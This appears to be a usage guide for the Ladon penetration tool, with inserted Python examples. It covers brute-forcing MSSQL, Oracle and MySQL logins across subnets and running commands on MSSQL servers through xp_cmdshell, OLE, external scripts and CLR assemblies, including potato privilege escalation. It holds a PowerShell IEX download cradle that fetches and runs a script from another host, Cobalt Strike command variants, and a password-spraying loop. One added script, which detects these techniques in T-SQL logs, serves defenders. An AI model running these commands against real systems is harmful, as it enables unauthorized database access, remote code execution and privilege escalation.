Port 1433 MSSQL database password brute force
Ladon 192.168.1.8/24 MssqlScan
Configuring the brute-force parameters
1 Supports the standard user.txt and pass.txt credential cracking: for each user the password list is run to completion, or until the correct password is found
2 Supports userpass.txt (a username with its matching password), used to quickly verify whether other machines share the same credentials
3 Supports check.txt (IP / port / database name / user / password); if the port and database name are omitted, the defaults are used
user.txt and pass.txt hold the users and the passwords respectively
userpass.txt holds user/password pairs, i.e. one user and its password per line
check.txt holds one IP / port / database name / user / password per line (port and database name optional)
Database password check
MSSQL password verification
(In a large intranet you may have collected a large number of machine passwords from other hosts; the first step is always to verify them.)
For a non-default port, change the port in the lines below to the modified port; a single IP can be scanned directly with Ladon IP:port MssqlScan
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
Command: Ladon MssqlScan
Oracle works the same way
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
Command: Ladon OracleScan
MySQL needs no database name
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
Command: Ladon MysqlScan
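The three credential-file layouts above share one convention: fields are whitespace-separated, and in check.txt the port and the database name are optional, falling back to per-service defaults (MSSQL 1433/master, Oracle 1521/orcl, MySQL 3306 with no database name). The Python below is an added example, not Ladon's own code: it parses check.txt lines with those defaults, reads userpass.txt pairs, and models the user.txt x pass.txt loop with the page's stop rule (move to the next user as soon as one password works). The login attempt is a caller-supplied callback so the script runs offline; the sample check.txt reuses the page's own lines, and the stub that accepts only k8gege is constructed for the demonstration.

```python
"""Parse Ladon-style credential files and drive a credential check.

Added example, not Ladon's code. Assumptions: fields are whitespace-separated;
in check.txt the port and database/instance name are optional and fall back to
the per-service defaults given on the page.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple

# Defaults applied when check.txt omits the port and/or database name.
DEFAULTS = {
    "mssql": (1433, "master"),
    "oracle": (1521, "orcl"),
    "mysql": (3306, None),
}


@dataclass(frozen=True)
class Target:
    host: str
    port: int
    database: Optional[str]
    user: str
    password: str


def parse_check_line(line: str, service: str) -> Optional[Target]:
    """Parse one check.txt line: IP [port] [database] user password.

    Returns None for blank or '#' comment lines and raises ValueError for
    malformed ones, so a bad line stops the run instead of silently becoming
    a bogus login attempt. Caveat: a purely numeric database name would be
    read as a port; none of the page's defaults are numeric.
    """
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    fields = line.split()
    if not 3 <= len(fields) <= 5:
        raise ValueError(f"expected 3 to 5 fields, got {len(fields)}: {line!r}")
    port, database = DEFAULTS[service]
    host, user, password = fields[0], fields[-2], fields[-1]
    for token in fields[1:-2]:          # zero, one or two optional middle fields
        if token.isdigit():
            port = int(token)
            if not 0 < port < 65536:
                raise ValueError(f"bad port {port}: {line!r}")
        else:
            database = token
    return Target(host, port, database, user, password)


def parse_check_file(text: str, service: str) -> List[Target]:
    """Parse a whole check.txt, reporting the 1-based line number on error."""
    targets = []
    for number, raw in enumerate(text.splitlines(), 1):
        try:
            target = parse_check_line(raw, service)
        except ValueError as exc:
            raise ValueError(f"check.txt line {number}: {exc}") from None
        if target is not None:
            targets.append(target)
    return targets


def parse_userpass(text: str) -> List[Tuple[str, str]]:
    """userpass.txt: one 'user password' pair per line, reused against every host."""
    pairs = []
    for raw in text.splitlines():
        fields = raw.split()
        if len(fields) == 2:
            pairs.append((fields[0], fields[1]))
    return pairs


def spray(hosts: Iterable[str], users: Iterable[str], passwords: Iterable[str],
          service: str, try_login: Callable[[Target], bool]) -> List[Target]:
    """user.txt x pass.txt mode with the page's stop rule: per host and user, walk
    the password list until a login succeeds or the list is exhausted.
    try_login is supplied by the caller (a real database login, or a stub)."""
    port, database = DEFAULTS[service]
    passwords = list(passwords)
    found = []
    for host in hosts:
        for user in users:
            for password in passwords:
                target = Target(host, port, database, user, password)
                if try_login(target):
                    found.append(target)
                    break               # next user; stop guessing this one
    return found


# Constructed sample input: the page's three equivalent MSSQL lines plus a comment.
CHECK_TXT = """# MSSQL: all three lines name the same target
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
"""

if __name__ == "__main__":
    for target in parse_check_file(CHECK_TXT, "mssql"):
        print(target)
    # Offline stand-in for a login: only the password 'k8gege' is accepted.
    print(spray(["192.168.1.8"], ["sa", "admin"], ["123456", "k8gege"],
                "mssql", lambda t: t.password == "k8gege"))
```

Replacing the stub with a real login (pymssql, cx_Oracle, pymysql) gives a minimal version of the verification step the page describes; the parser is the part worth keeping, because a malformed check.txt line should fail loudly rather than be sprayed as a credential.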
PowerLadon
Remotely load Ladon and run the MssqlScan weak-password brute force against port 1433
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 MssqlScan"
Kali, Linux, macOS, routers and other operating systems
./Ladon 192.168.1.8/24 MssqlScan
MSSQL database remote privilege escalation tool
In the command lines below, host, port, user, pass and cmdline are placeholders and master is the database to connect to.
Local:
Ladon MssqlCmd host info
Ladon MssqlCmd host open_shell
Ladon MssqlCmd host close_shell
Ladon MssqlCmd host xp_cmdshell cmdline
Ladon MssqlCmd host ws_shell cmdline
Ladon MssqlCmd host r_shell cmdline
Ladon MssqlCmd host py_shell cmdline
Ladon MssqlCmd host install_clr
Ladon MssqlCmd host uninstall_clr
Ladon MssqlCmd host clr_exec cmdline
Ladon MssqlCmd host clr_efspotato cmdline
Ladon MssqlCmd host clr_badpotato cmdline
Remote:
Ladon MssqlCmd host user pass master info
Ladon MssqlCmd host port user pass master open_shell
Ladon MssqlCmd host port user pass master close_shell
Ladon MssqlCmd host user pass master xp_cmdshell cmdline
Ladon MssqlCmd host user pass master ws_shell cmdline
Ladon MssqlCmd host user pass master r_shell cmdline
Ladon MssqlCmd host user pass master py_shell cmdline
Ladon MssqlCmd host user pass master install_clr
Ladon MssqlCmd host user pass master uninstall_clr
Ladon MssqlCmd host user pass master clr_exec cmdline
Ladon MssqlCmd host user pass master clr_efspotato cmdline
Ladon MssqlCmd host user pass master clr_badpotato cmdline
Cobalt Strike
Local:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline
Remote:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline
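Each MssqlCmd subcommand above leans on a server-side MSSQL feature that a defender can watch for: open_shell and close_shell toggle xp_cmdshell through sp_configure, ws_shell drives WScript.Shell through OLE Automation (sp_OACreate), r_shell and py_shell use sp_execute_external_script, and install_clr / clr_exec (including the clr_efspotato and clr_badpotato variants) load an assembly with CREATE ASSEMBLY. That mapping from subcommand to statement is an assumption based on how these features are normally enabled and invoked; the page only lists the subcommand names. The Python below is an added example, not part of Ladon: it tags a constructed capture of T-SQL statements (the kind an Extended Events sql_batch_completed session or SQL Audit would record) by technique, and flags the enable, execute, disable sequence that open_shell / xp_cmdshell / close_shell leave behind in one session. The assembly name and bytes in the sample are placeholders.

```python
"""Tag captured T-SQL statements by the MSSQL command-execution technique they use.

Added example, not part of Ladon. Assumption: the statements matched here are the
standard way each feature is enabled or invoked; the page lists only the MssqlCmd
subcommand names. SAMPLE_BATCH is a constructed capture of one session.
"""
import re
from typing import List, Optional, Tuple

# (tag, fingerprint) pairs; a statement may carry several tags.
RULES = [
    ("enable_xp_cmdshell", re.compile(r"sp_configure\s+N?'xp_cmdshell'\s*,\s*1", re.I)),
    ("disable_xp_cmdshell", re.compile(r"sp_configure\s+N?'xp_cmdshell'\s*,\s*0", re.I)),
    ("xp_cmdshell_exec", re.compile(r"xp_cmdshell\s+N?'", re.I)),
    ("ole_automation", re.compile(
        r"sp_OACreate\s+N?'wscript\.shell'"
        r"|sp_configure\s+N?'Ole Automation Procedures'\s*,\s*1", re.I)),
    ("external_script", re.compile(
        r"sp_execute_external_script"
        r"|sp_configure\s+N?'external scripts enabled'\s*,\s*1", re.I)),
    ("clr_load", re.compile(
        r"CREATE\s+ASSEMBLY|sp_configure\s+N?'clr enabled'\s*,\s*1"
        r"|sp_configure\s+N?'clr strict security'\s*,\s*0|sp_add_trusted_assembly", re.I)),
    ("clr_unload", re.compile(r"DROP\s+ASSEMBLY|sp_drop_trusted_assembly", re.I)),
]


def classify(statement: str) -> List[str]:
    """Return every technique tag whose fingerprint appears in the statement."""
    return [tag for tag, pattern in RULES if pattern.search(statement)]


def scan(statements: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (index, statement, tags) for each statement that matched a rule."""
    hits = []
    for index, statement in enumerate(statements):
        tags = classify(statement)
        if tags:
            hits.append((index, statement, tags))
    return hits


def xp_cmdshell_toggle(statements: List[str]) -> Optional[Tuple[int, int, int]]:
    """Find the enable -> execute -> disable sequence that open_shell, xp_cmdshell
    and close_shell produce in one session. A quick on/off toggle around a single
    command is a stronger signal than any one statement alone; returns the three
    indices or None when the full sequence is absent."""
    enabled_at = executed_at = None
    for index, statement in enumerate(statements):
        tags = classify(statement)
        if enabled_at is None and "enable_xp_cmdshell" in tags:
            enabled_at = index
        elif enabled_at is not None and executed_at is None and "xp_cmdshell_exec" in tags:
            executed_at = index
        elif executed_at is not None and "disable_xp_cmdshell" in tags:
            return (enabled_at, executed_at, index)
    return None


# Constructed capture; the assembly name and bytes are placeholders, not real code.
SAMPLE_BATCH = [
    "SELECT @@VERSION, SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "EXEC master..xp_cmdshell 'whoami'",
    "EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;",
    "SELECT name FROM sys.databases",
    "EXEC sp_configure 'clr enabled', 1; RECONFIGURE;",
    "CREATE ASSEMBLY sample_asm FROM 0x4D5A90000300 WITH PERMISSION_SET = UNSAFE",
    "EXEC sp_execute_external_script @language = N'Python', "
    "@script = N'import os; os.system(\"whoami\")'",
]

if __name__ == "__main__":
    for index, statement, tags in scan(SAMPLE_BATCH):
        print(f"[{index}] {', '.join(tags)}: {statement}")
    print("xp_cmdshell toggle:", xp_cmdshell_toggle(SAMPLE_BATCH))
```

The practical caveat is that close_shell only undoes the sp_configure change; an assembly loaded by install_clr stays until uninstall_clr (or DROP ASSEMBLY) is run, so sys.assemblies and the trusted-assembly list are worth reviewing after any such session.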
Tool download
Latest version: https://k8gege.org/Download
Previous versions: https://github.com/k8gege/Ladon/releases